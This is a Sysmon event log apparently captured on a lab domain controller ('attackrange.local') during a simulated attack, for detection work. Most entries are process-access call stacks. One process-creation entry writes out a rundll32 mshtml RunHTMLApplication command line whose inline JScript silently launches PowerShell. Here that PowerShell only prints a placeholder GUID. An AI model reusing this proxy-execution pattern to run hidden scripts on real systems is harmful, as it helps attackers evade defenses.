15:59:39.834{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.834{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000026916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.788{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mjmjcult.xa1.ps12021-01-20 15:59:39.788 10341000x800000000000000026915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.741{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.741{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.741{7901BC46-536B-6008-7006-00000000A301}7828948C:\Windows\system32\conhost.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.725{7901BC46-536B-6008-6E06-00000000A301}74926420C:\Windows\System32\rundll32.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\System32\wshom.ocx+c10d|C:\Windows\System32\wshom.ocx+be11|C:\Windows\System32\OLEAUT32.dll+2306f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\OLEAUT32.dll+ce27|C:\Windows\System32\OLEAUT32.dll+ce27 154100x800000000000000026904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.730{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%3Chta:application%3E%3Cscript%20language="JScript.Compact"%3Ea=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();%3C/script%3E 10341000x800000000000000026903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.694{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.678{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.678{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.663{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.663{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 